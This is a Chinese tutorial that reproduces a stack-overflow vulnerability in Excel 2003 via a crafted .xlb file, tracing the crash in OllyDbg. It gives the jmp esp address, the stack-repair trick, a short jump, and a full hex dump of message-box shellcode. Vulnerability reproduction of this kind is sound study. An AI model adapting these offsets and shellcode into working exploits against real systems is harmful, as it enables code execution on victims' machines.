作者丨黑蛋

三、漏洞验证

首先我们配置环境，并下载poc：

使用ollydbg附加office excel 2003：

打开poc

可以看到发生了访问违规异常，像地址0x51453844中写入时发生异常，证明漏洞是存在的。

四、漏洞复现

继续上述操作，到发生异常的时候，回到堆栈，然后转到EBP附近：

可以看到给EAX赋值EBP+2C的值，再向EAX中的地址写入时发生了异常。

接下来记下300CE361这个发生异常的地址，下断点，再自己随意创建一个文件：123.xlb，然后继续打开excel并用ollydbg附加，我们看看异常时候堆栈的正常情况是咋样的：

可以看到EBP这里是不一样的，然后我们在堆栈中对EBP+4的位置按回车：

可以看到这里就是关键函数，我们下断点（300CFACF），然后重新运行，打开poc：

可以看到断点断在了关键函数，

接下来我们顺带在0013AA90（此时EBP+4）处下内存写入断点，然后跑起来，第一次断在了一个拷贝代码处：

但是查看堆栈，这里并不是0013AA8C处，我们继续运行，同样停留在这个地方，而此时的堆栈已经在0013AA90附近：

我们在断点处上方shr ecx，2处下断点，然后重新运行，按照前面经验，我们需要断在第二次，然后观察：

可以看到拷贝数据是ESI指向的一坨，然后拷贝起始地址在0013AA3B，拷贝长度是300。我们记下这一坨，在poc中查找：

然后我们锁定堆栈，再走完拷贝代码，可以看到返回地址被修改，同时这块被篡改的数值是30424232，记录这个数据可以待会构造payload：

然后我们ctrl+f查找jmp esp：

接下来用010Editor打开poc，找找前面那坨拷贝数据：

接下来我们初步构造一下，把返回地址那里改成jmp esp地址（30018447)，然后后面跟上我们的祖传弹窗shellcode，其他地方改成90909090：

弹窗shellcode：

FC 68 6A 0A 38 1E 68 63 89 D1 4F 68 32 74 91 0C

8B F4 8D 7E F4 33 DB B7 04 2B E3 66 BB 33 32 53

68 75 73 65 72 54 33 D2 64 8B 5A 30 8B 4B 0C 8B

49 1C 8B 09 8B 69 08 AD 3D 6A 0A 38 1E 75 05 95

FF 57 F8 95 60 8B 45 3C 8B 4C 05 78 03 CD 8B 59

20 03 DD 33 FF 47 8B 34 BB 03 F5 99 0F BE 06 3A

C4 74 08 C1 CA 07 03 D0 46 EB F1 3B 54 24 1C 75

E4 8B 59 24 03 DD 66 8B 3C 7B 8B 59 1C 03 DD 03

2C BB 95 5F AB 57 61 3D 6A 0A 38 1E 75 A9 33 DB

53 68 66 66 66 66 68 66 66 66 66 8B C4 53 50 50

53 FF 57 FC 53 FF 57 F8

然后在shellcode结尾加4个90隔开：

接下来我们继续用excel打开改造后的xlb：

可以看到位置没有出错，我们执行到返回，发现并没有执行到跳板指令那里，我们继续执行到返回，然后再继续执行到返回，结果出现异常：

可以看到这里出现异常，所以我们需要修复堆栈，在EBP+2C的地址放一个可以写入的地址（0013AA7C），然后前面都是90909090，再加一个短跳跳到EBP+2C的位置，然后在EBP+2C+4的位置开始放入shellcode：

短跳（EB 12）：

开始构造新的payload：

然后继续测试，可以看到这里没有发生异常：

到了jmp esp：

这里出了岔子，跳到了shellcode+4的位置，导致代码识别出错，我们需要把shellcode再往后挪一下：

这次成功了：